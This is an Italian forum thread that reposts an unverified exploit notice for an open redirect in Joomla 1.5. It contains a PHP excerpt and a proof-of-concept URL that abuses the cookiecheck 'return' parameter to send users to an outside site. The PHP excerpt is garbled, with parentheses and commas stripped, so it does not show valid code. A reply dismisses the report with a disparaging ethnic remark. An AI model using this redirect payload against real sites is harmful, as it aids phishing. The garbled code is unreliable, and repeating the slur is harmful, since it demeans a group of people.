Autore Topic: Joomla 1.5 URL Redirecting Vulnerability  (Letto 2042 volte)

Offline jeckodevelopment

  • Administrator
  • Instancabile
  • *****
  • Post: 5677
  • Sesso: Maschio
    • Mostra profilo
Joomla 1.5 URL Redirecting Vulnerability
« il: 24 Ago 2010, 21:01:27 »
Questa presunta vulnerabilitÓ colpirebbe il sistema di redirezione URL di Joomla 1.5.
Non esistono al momento conferme sulla vulnerabilitÓ in oggetto.

Codice: [Seleziona]
============================================
Joomla!   (Multiple) Exploit
===========================================
#  Powered  Joomla! 1.5 & All version Down  (Multiple)
# Published: 2010-08-24
# Verified: NO
# Download Exploit Code
===
# Software :  http://www.joomla.org/download.html
# Vendor   :  http://www.joomla.org/
===

<?php
    
}

    if ( 
$return && !( strpos$return'com_registration' ) || strpos$return'com_login' ) ) ) {
    
// checks for the presence of a return url
    // and ensures that this url is not the registration or login pages
        // If a sessioncookie exists, redirect to the given page. Otherwise, take an extra round for a cookiecheck
        
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            
mosRedirect$return );
        } else {
            
mosRedirect$mosConfig_live_site .'/index.php?option=cookiecheck&return=' urlencode$return ) );
        }
    } else {
        
// If a sessioncookie exists, redirect to the start page. Otherwise, take an extra round for a cookiecheck
        
if (isset( $_COOKIE[mosMainFrame::sessionCookieName()] )) {
            
mosRedirect$mosConfig_live_site .'/index.php' );
        } else {
            
mosRedirect$mosConfig_live_site .'/index.php?option=cookiecheck&return=' urlencode$mosConfig_live_site .'/index.php' ) );
        }
    }

} else if (
$option == 'logout') {
    
$mainframe->logout();

    
// JS Popup message
    
if ( $message ) {
        
?>


=========
# ExploiT
 
    http://127.0.0.1/path/index.php?option=cookiecheck&return=http://Google.com/

mau_develop

  • Visitatore
Re:Joomla 1.5 URL Redirecting Vulnerability
« Risposta #1 il: 25 Ago 2010, 09:46:37 »
dovrebbe essere solo per il legacy ... arabetti ...soliti arabetti :)

M.

 

Host

Torna su